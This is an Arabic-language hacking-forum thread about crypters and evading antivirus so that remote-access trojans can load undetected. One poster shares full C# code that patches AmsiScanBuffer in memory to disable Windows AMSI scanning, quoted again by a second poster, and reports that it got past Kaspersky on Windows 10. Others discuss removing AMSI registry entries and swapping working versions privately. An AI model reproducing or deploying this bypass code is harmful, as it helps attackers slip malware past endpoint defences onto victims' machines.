تشفيرة ( ملف لاختبار برامج الحمايه ) تشفيره بتاريخ 10/10/2020

[prooonet]

لدي استفسار احاول الاعتماد على نفسي حاليا بالفحص الديناميكي
لان ليس لدي خبرة كافية بالفحص الساكن واستعمال هذه الادوات

Sandbox
Process Monitor
Wireshark
cports
Fakenet
EMCO MSI Package Builder

واعتقد انها ادوات كافية لتحليل الديناميكي لمن يتقنها ولدي معرفة جيدة بهذه الادوات
ولدي عينة قديمة تم وضعها هنا سابقا وتوجد عليها حماية من التشغيل بالوهمي بعد التجربة
عليها عدة تجارب فهي لاتتصل بالهوست بتشغيلها خارج الساندبوكس وبعد تشغيلها داخل
الساندبوكس يتم كشف الاتصال سؤالي هو هل يمكن كشف اتصال اي عينة بهذه الطريقة
اذا كانت محمية من التشغيل في النظام الوهمي وحمايات اخرى

 

[MagicianMiDo32]

هممم حسننا ساحول تتبع هذا الاسلوب الجديد

لان واضح كده انه جيل جديد من الحمايه

ال AMSI باختصار هي وحدة حماية موجهة للدوت نت والباورشيل
يعني كأنه بيخلي الأنتيفيرس يعمل هوك على دوال الدوت نت نفسه زي Appdomain.Load ويقدر يقرأ البايت الي بتبعته للدالة دي
يعني احنا بنشفر بايتات السيرفر ونرجع نفك تشفيرها في الذاكرة ونبعتها للدالة دي علشان تحملها
هو بقى ماسك الدوال دي كلها وكل ابديت جديد بيحدثوا فيه الحماية دي ويقفلوا الثغرات الي كانت موجودة قبل كدا
فلو انتا مثلا لقيت طريقة تخطي الأبديت الجاي هتتمسك
الوحدة دي موجودة في أحدث اصدار من ويندوز 10 بس وبرامج الحماية زي النود والأفاست وغيرها بتستخدمها
فالحل ان السيرفر نفسه يكون كلين قبل ما تحقنه وحتى كدا ممكن يتمسك بردو
أو تستخدم حاجة نيتف
دا غير الكلاود الي بقى مولع فالدنيا خالص وخلى اغلب الملغمين يعتزلوا
حتى الميتربريتر بقى بيتمسك فالذاكرة مهما عملت وسويت
الوضع اختلف ومعادش سهل فعلا

 

[tiktoshitiktoshi is verified member.]

Malware found
The pattern of 'BDS/Redcap.cjfbt [backdoor]' detected

 

[black007]

ال AMSI باختصار هي وحدة حماية موجهة للدوت نت والباورشيل
يعني كأنه بيخلي الأنتيفيرس يعمل هوك على دوال الدوت نت نفسه زي Appdomain.Load ويقدر يقرأ البايت الي بتبعته للدالة دي
يعني احنا بنشفر بايتات السيرفر ونرجع نفك تشفيرها في الذاكرة ونبعتها للدالة دي علشان تحملها
هو بقى ماسك الدوال دي كلها وكل ابديت جديد بيحدثوا فيه الحماية دي ويقفلوا الثغرات الي كانت موجودة قبل كدا
فلو انتا مثلا لقيت طريقة تخطي الأبديت الجاي هتتمسك
الوحدة دي موجودة في أحدث اصدار من ويندوز 10 بس وبرامج الحماية زي النود والأفاست وغيرها بتستخدمها
فالحل ان السيرفر نفسه يكون كلين قبل ما تحقنه وحتى كدا ممكن يتمسك بردو
أو تستخدم حاجة نيتف
دا غير الكلاود الي بقى مولع فالدنيا خالص وخلى اغلب الملغمين يعتزلوا
حتى الميتربريتر بقى بيتمسك فالذاكرة مهما عملت وسويت
الوضع اختلف ومعادش سهل فعلا

الموضوع فعلا مش سهل ومجننى من امبارح تقريبا انا تقريبا صاحى اكتر من 19 ساعه

مش علشان بحاول فيها انما الموضوع فعلا مش سهل لان محتاج تبرمج مكتبه تتخطى بيها الداله بالكامل

Hit بسيطر ( بص كده ياكبير )

[hide]

using System;
using System.Runtime.InteropServices;

public class Amsi
{
    
    static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

    public static void Bypass()
    {
        if (is64Bit())
            PatchAmsi(x64);
        else
            PatchAmsi(x86);
    }

    private static void PatchAmsi(byte[] patch)
    {
        try
        {
            var lib = Win32.LoadLibrary("amsi.dll");
            var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer");

            uint oldProtect;
            Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);

            Marshal.Copy(patch, 0, addr, patch.Length);
        }
        catch (Exception e)
        {
            Console.WriteLine(" [x] {0}", e.Message);
            Console.WriteLine(" [x] {0}", e.InnerException);
        }
    }

    private static bool is64Bit()
        {
            bool is64Bit = true;

            if (IntPtr.Size == 4)
                is64Bit = false;

            return is64Bit;
        }
}

class Win32
{
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}

[/hide]



بس لقيت الحل وتم التخطى على احدث اصدار وييندوز 10 بلدر 2004 نسخه X64 مثبت عليه الكاسبر

للعلم برامج الحمايه بتستخدم نفس المكتبات فى AMSI فلو عديت من مكتبت windows defender يبقه شكرا ( تم التجربه فعلا على الكاسبر وتم التخطى )

الملف المستخدم لللودر powershell

تفتكر انشر الملف ولا فكك

 

[MagicianMiDo32]

الموضوع فعلا مش سهل ومجننى من امبارح تقريبا انا تقريبا صاحى اكتر من 19 ساعه

مش علشان بحاول فيها انما الموضوع فعلا مش سهل لان محتاج تبرمج مكتبه تتخطى بيها الداله بالكامل

Hit بسيطر ( بص كده ياكبير )

[hide]

using System;
using System.Runtime.InteropServices;

public class Amsi
{
   
    static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

    public static void Bypass()
    {
        if (is64Bit())
            PatchAmsi(x64);
        else
            PatchAmsi(x86);
    }

    private static void PatchAmsi(byte[] patch)
    {
        try
        {
            var lib = Win32.LoadLibrary("amsi.dll");
            var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer");

            uint oldProtect;
            Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);

            Marshal.Copy(patch, 0, addr, patch.Length);
        }
        catch (Exception e)
        {
            Console.WriteLine(" [x] {0}", e.Message);
            Console.WriteLine(" [x] {0}", e.InnerException);
        }
    }

    private static bool is64Bit()
        {
            bool is64Bit = true;

            if (IntPtr.Size == 4)
                is64Bit = false;

            return is64Bit;
        }
}

class Win32
{
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}

[/hide]



بس لقيت الحل وتم التخطى على احدث اصدار وييندوز 10 بلدر 2004 نسخه X64 مثبت عليه الكاسبر

للعلم برامج الحمايه بتستخدم نفس المكتبات فى AMSI فلو عديت من مكتبت windows defender يبقه شكرا ( تم التجربه فعلا على الكاسبر وتم التخطى )

الملف المستخدم لللودر powershell

تفتكر انشر الملف ولا فكك

ايوة الـ amsi دا عبارة عن com provider وبرامج الحماية بتسجل فيه في الريجستري
كنت بتخطاه اني احذف قيم الريجستري دي واشتغلت شوية بس اترقعت بردو
الباتشينج معادش شغال اترقع هو كمان
اعتقد المشكلة من الكاسبر نفسه جرب الأفاست
والبتديفندر كمان

 

[MagicianMiDo32]

لو جربت تباتش العملية بتاعتك هتنهار

 

[black007]

ايوة الـ amsi دا عبارة عن com provider وبرامج الحماية بتسجل فيه في الريجستري
كنت بتخطاه اني احذف قيم الريجستري دي واشتغلت شوية بس اترقعت بردو
الباتشينج معادش شغال اترقع هو كمان
اعتقد المشكلة من الكاسبر نفسه جرب الأفاست
والبتديفندر كمان

لو جربت تباتش العملية بتاعتك هتنهار

هجرب واقولك ايه الى تم مع البتدفندر والافاست

لان فعلا باختلاف نوع الرات كانت فعلا العمليه بتكراش معايا اكتر من مره

هجرب اعيد كتابه المكتبه ولكن بشكل مختلف

وهبعتهالك على الخاص لو نجحت

 

[White Man]

هجرب واقولك ايه الى تم مع البتدفندر والافاست

لان فعلا باختلاف نوع الرات كانت فعلا العمليه بتكراش معايا اكتر من مره

هجرب اعيد كتابه المكتبه ولكن بشكل مختلف

وهبعتهالك على الخاص لو نجحت

لو جربت تباتش العملية بتاعتك هتنهار

check inbox